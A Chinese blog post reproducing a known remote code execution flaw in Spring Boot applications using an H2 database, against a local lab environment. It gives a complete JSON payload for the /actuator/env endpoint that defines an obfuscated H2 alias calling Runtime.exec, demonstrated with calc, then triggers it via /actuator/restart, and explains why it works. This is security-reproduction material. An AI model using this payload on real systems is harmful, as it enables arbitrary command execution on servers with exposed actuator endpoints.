登录
当前位置: 首页 > 工具软件 > h2database > 使用案例 >

restart h2 database query RCE复现

宗政安歌
2023-12-01

restart h2 database query RCE复现

漏洞环境:

https://github.com/LandGrey/SpringBootVulExploit/tree/master/repository/springboot-h2-database-rce

IDEA 打开配置一个 Spring Boot 程序即可

漏洞复现:

  1. 访问 /actuator/env 接口修改 spring.datasource.hikari.connection-test-query 属性为通过 CREATE ALIAS 创建的自定义函数

    http://127.0.0.1:9096/actuator/env
application/json

{"name":"spring.datasource.hikari.connection-test-query","value":"CREATE ALIAS T5 AS CONCAT('void ex(String m1,String m2,String m3)throws Exception{Runti','me.getRun','time().exe','c(new String[]{m1,m2,m3});}');CALL T5('cmd','/c','calc');"}

  2. 访问 /actuator/restart 接口重启 Spring Boot 程序,触发自定义函数执行

    http://127.0.0.1:9096/actuator/restart
application/json

漏洞原理:

HikariCP 数据库连接池的 connectionTestQuery 属性配置作用是定义一个连接数据库前执行的 SQL 测试语句,通过访问 /actuator/env 接口修改 spring.datasource.hikari.connection-test-query 值,其实就是修改 connectionTestQuery 属性配置,再通过 /actuator/restart 接口重启Spring Boot程序,这时会重新连接数据库从而执行自定义 SQL 函数(只有这个SQL函数没有被执行过,重启 Spring Boot 程序的时候才会执行这个SQL函数,所以每执行一次命令就要把自定义函数的名字换一下)

Reference:

https://github.com/LandGrey/SpringBootVulExploit

 类似资料:

相关阅读

JS实现复制功能MySQL复制numpy复发与 [重复]php5对象复制、clone、浅复制与深复制实例详解

相关文章

JavaFX复选框面试复盘Go语言复数Java复制数组宇 信 Java 复试

相关问答

如何修复选择输入字段[重复]时出现的“不允许复合类名”异常将键复制到列[重复]Docusign XML复选为复选框POI XSSFWorkbook克隆/复制/复制“sudo xcodebuild-license”无法修复重复出现的xcode许可提示

相关文档

复杂性思维Oracle 备份与恢复深入理解 OpenStack 网络实现 NeutronRedis 设计与实现认识现代 WebGIS
快捷导航: 新手教程 算法原理 架构设计 Java进阶 数据库进阶 大厂专栏 面试经验 编程笔记 编程问答 所有专题 文档资料 工具软件 电子书籍 小牛导航
在线工具: 房贷计算器 个税计算器 Linux命令查询 Json格式化 正则表达式 颜色转换 AES加解密 SHA1加密 MD5加密 毒鸡汤 字数统计 随机密码生成 进制转换 Base64编解码 励志句子
Copyright © 2019-2024 小牛知识库@xnip.cn. All Rights Reserved.